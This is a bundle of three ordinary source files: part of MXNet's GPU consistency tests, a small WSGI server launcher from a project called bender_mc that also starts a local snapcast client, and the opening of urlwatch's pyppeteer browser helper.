mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
@assert_raises_cudnn_disabled()
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed(1234)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_psroipooling_with_type():
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_convolution_with_type():
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 10, 10),
# 'deformable_conv_offset': (2, 18, 8, 8),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'}, tol=tol)
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# Pad > 0
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 36, 5, 5),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
name='deformable_conv')
@with_seed()
@assert_raises_cudnn_disabled()
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
@assert_raises_cudnn_disabled()
def test_rnn_layer():
check_rnn_layer(gluon.rnn.RNN(100, num_layers=3))
check_rnn_layer(gluon.rnn.RNN(100, activation='tanh', num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3))
check_rnn_layer(gluon.rnn.GRU(100, num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
check_rnn_layer_w_rand_inputs(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_gluon_ctc_consistency():
loss = mx.gluon.loss.CTCLoss()
data = mx.nd.arange(0, 4, repeat=40, ctx=mx.gpu(0)).reshape((2,20,4)).flip(axis=0)
cpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.cpu(0))
gpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.gpu(0))
cpu_data = data.copy().as_in_context(mx.cpu(0))
cpu_data.attach_grad()
with mx.autograd.record():
l_cpu = loss(cpu_data, cpu_label)
l_cpu.backward()
gpu_data = data.copyto(mx.gpu(0))
gpu_data.attach_grad()
with mx.autograd.record():
l_gpu = loss(gpu_data, gpu_label)
l_gpu.backward()
assert_almost_equal(cpu_data.grad.asnumpy(), gpu_data.grad.asnumpy(), atol=1e-3, rtol=1e-3)
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_global_norm_clip_multi_device():
x1 = mx.nd.ones((3,3), ctx=mx.gpu(0))
x2 = mx.nd.ones((4,4), ctx=mx.cpu(0))
norm = gluon.utils.clip_global_norm([x1, x2], 1.0)
assert norm == 5.0
assert_almost_equal(x1.asnumpy(), np.ones((3,3))/5)
assert_almost_equal(x2.asnumpy(), np.ones((4,4))/5)
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@with_seed()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% gurantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y.asnumpy(), gpu_y.asnumpy(), atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad.asnumpy(), gpu_a.grad.asnumpy(),
atol = 1e-3, rtol = 1e-3)
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def _check_batchnorm_result(input, num_devices=1, cuda=False):
from mxnet.gluon.utils import split_and_load
def _find_bn(module):
if isinstance(module, (mx.gluon.nn.BatchNorm, mx.gluon.contrib.nn.SyncBatchNorm)):
return module
elif isinstance(module.module, (mx.gluon.nn.BatchNorm, mx.gluon.contrib.nn.SyncBatchNorm)):
return module.module
raise RuntimeError('BN not found')
def _syncParameters(bn1, bn2, ctx):
ctx = input.context
bn2.gamma.set_data(bn1.gamma.data(ctx))
bn2.beta.set_data(bn1.beta.data(ctx))
bn2.running_mean.set_data(bn1.running_mean.data(ctx))
bn2.running_var.set_data(bn1.running_var.data(ctx))
input1 = input.copy()
input2 = input.copy()
if cuda:
input1 = input.as_in_context(mx.gpu(0))
ctx_list = [mx.gpu(i) for i in range(num_devices)]
else:
ctx_list = [mx.cpu(0) for _ in range(num_devices)]
nch = input.shape[1]
bn1 = mx.gluon.nn.BatchNorm(in_channels=nch)
bn2 = mx.gluon.contrib.nn.SyncBatchNorm(in_channels=nch, num_devices=num_devices)
bn1.initialize(ctx=ctx_list[0])
bn2.initialize(ctx=ctx_list)
# using the same values for gamma and beta
#_syncParameters(_find_bn(bn1), _find_bn(bn2), ctx_list[0])
input1.attach_grad()
inputs2 = split_and_load(input2, ctx_list, batch_axis=0)
for xi in inputs2:
xi.attach_grad()
with mx.autograd.record():
output1 = bn1(input1)
output2 = [bn2(xi) for xi in inputs2]
loss1 = (output1 ** 2).sum()
loss2 = [(output ** 2).sum() for output in output2]
mx.autograd.backward(loss1)
mx.autograd.backward(loss2)
output2 = mx.nd.concat(*[output.as_in_context(input.context) for output in output2], dim=0)
# assert forwarding
assert_almost_equal(input1.asnumpy(), input2.asnumpy(), atol=1e-3, rtol=1e-3)
assert_almost_equal(output1.asnumpy(), output2.asnumpy(), atol=1e-3, rtol=1e-3)
assert_almost_equal(_find_bn(bn1).running_mean.data(ctx_list[0]).asnumpy(),
_find_bn(bn2).running_mean.data(ctx_list[0]).asnumpy(),
atol=1e-3, rtol=1e-3)
assert_almost_equal(_find_bn(bn1).running_var.data(ctx_list[0]).asnumpy(),
_find_bn(bn2).running_var.data(ctx_list[0]).asnumpy(),
atol=1e-3, rtol=1e-3)
input2grad = mx.nd.concat(*[output.grad.as_in_context(input.context) for output in inputs2], dim=0)
assert_almost_equal(input1.grad.asnumpy(), input2grad.asnumpy(), atol=1e-3, rtol=1e-3)
def test_sync_batchnorm():
def get_num_devices():
for i in range(100):
try:
mx.nd.zeros((1,), ctx=mx.gpu(i))
except:
return i
# no need to use SyncBN with 1 gpu
if get_num_devices() < 2:
return
ndev = 2
# check with unsync version
for i in range(10):
_check_batchnorm_result(mx.nd.random.uniform(shape=(4, 1, 4, 4)),
num_devices=ndev, cuda=True)
if __name__ == '__main__':
import nose
nose.runmodule()
|
server.py
|
"""
bender_mc.server
~~~~~~~~~~~~~~~~
Built in, production ready webserver for easy access.
"""
# :copyright: (c) 2020 by Nicholas Repole.
# :license: MIT - See LICENSE for more details.
import configparser
from cheroot import wsgi
from cheroot.ssl.builtin import BuiltinSSLAdapter
import os
import logging
import threading
import sys
import subprocess
logger = logging.getLogger(__name__)
_http_server = None
_https_server = None
_snapclient = None
def run(app, root_prefix="", hostname="0.0.0.0", http_port=None,
https_port=None, https_cert_path=None, https_certkey_path=None):
root_prefix = root_prefix or ""
dispatcher = wsgi.PathInfoDispatcher({root_prefix: app})
global _http_server
global _https_server
http_thread = None
https_thread = None
if http_port:
_http_server = wsgi.Server(
(hostname, http_port), dispatcher)
http_thread = threading.Thread(target=_http_server.start)
if https_port:
_https_server = wsgi.Server(
(hostname, https_port), dispatcher)
_https_server.ssl_adapter = BuiltinSSLAdapter(
https_cert_path, https_certkey_path)
https_thread = threading.Thread(target=_https_server.start)
if http_thread is not None:
http_thread.start()
if https_thread is not None:
https_thread.start()
snapclient_cmd = (
"C:\\Users\\repole\\Projects\\snapcast\\bin\\Release\\snapclient.exe "
"-h 192.168.1.98 "
"-p 1704").split(" ")
subprocess.Popen(snapclient_cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def run_wsgi_servers(app, user_data_path):
config_file = os.path.join(user_data_path, 'config.ini')
config_parser = configparser.RawConfigParser()
config_parser.read(config_file)
try:
http_port = config_parser.getint('api_server', 'http_port')
except (ValueError, TypeError):
http_port = None
try:
https_port = config_parser.getint('api_server', 'https_port')
except (ValueError, TypeError):
https_port = None
hostname = config_parser.get('api_server', 'hostname').strip("'").strip('"')
hostname = None if hostname == "None" else hostname
root_prefix = config_parser.get('api_server', 'root').strip('"').strip("'")
root_prefix = None if root_prefix == "None" else root_prefix
https_cert_path = os.path.join(user_data_path, 'keys', 'server.crt')
https_certkey_path = os.path.join(user_data_path, 'keys', 'server.crtkey')
run(app, root_prefix, hostname, http_port, https_port, https_cert_path,
https_certkey_path)
def stop_wsgi_servers():
global _http_server
global _https_server
if _http_server is not None:
_http_server.stop()
if _https_server is not None:
_https_server.stop()
def restart_wsgi_servers():
logger.debug("Entering restart_wsgi_servers()")
args = sys.argv
args[0] = '"' + args[0] + '"'
os.execl(sys.executable, sys.executable, * args)
|
browser.py
|
# -*- coding: utf-8 -*-
#
# This file is part of urlwatch (https://thp.io/2008/urlwatch/).
# Copyright (c) 2008-2020 Thomas Perl <m@thp.io>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import pyppeteer
import asyncio
import threading
from .cli import setup_logger
logger = logging.getLogger(__name__)
class BrowserLoop(object):
def __init__(self):
self._event_loop = asyncio.new_event_loop()
self._browser = self._event_loop.run_until_complete(self._launch_browser())
self._loop_thread = threading.Thread(target=self._event_loop.run_forever)
self._loop_thread.start()
@asyncio.coroutine
def _launch_browser(self):
browser = yield from pyppeteer.launch()
for p in (yield from browser.pages()):
yield from p.close()
return browser
@asyncio.coroutine
def _get_content(self, url, wait_until=None):
context = yield from self._browser.createIncognitoBrowserContext()
page = yield from context.newPage()
opts = {}
if wait_until is not None:
opts['waitUntil'] = wait_until
yield from page.goto(url, opts)
content = yield from page.content()
yield from context.close()
return content
def process(self, url, wait_until=None):
coroutine = self._get_content(url, wait_until=wait_until)
return asyncio.run_coroutine_threadsafe(coroutine, self._event_loop).result()
def destroy(self):
self._event_loop.call_soon_threadsafe(self._event_loop.stop)
self._loop_thread.join()
self._loop_thread = None
self._event_loop.run_until_complete(self._browser.close())
self._browser = None
self._event_loop = None
class BrowserContext(object):
_BROWSER_LOOP = None
_BROWSER_LOCK = threading.Lock()
_BROWSER_REFCNT = 0
def __init__(self):
with BrowserContext._BROWSER_LOCK:
if BrowserContext._BROWSER_REFCNT == 0:
logger.info('Creating browser main loop')
BrowserContext._BROWSER_LOOP = BrowserLoop()
BrowserContext._BROWSER_REFCNT += 1
def process(self, url, wait_until=None):
return BrowserContext._BROWSER_LOOP.process(url, wait_until=wait_until)
def close(self):
with BrowserContext._BROWSER_LOCK:
BrowserContext._BROWSER_REFCNT -= 1
if BrowserContext._BROWSER_REFCNT == 0:
logger.info('Destroying browser main loop')
BrowserContext._BROWSER_LOOP.destroy()
BrowserContext._BROWSER_LOOP = None
def main():
import argparse
parser = argparse.ArgumentParser(description='Browser handler')
parser.add_argument('url', help='URL to retrieve')
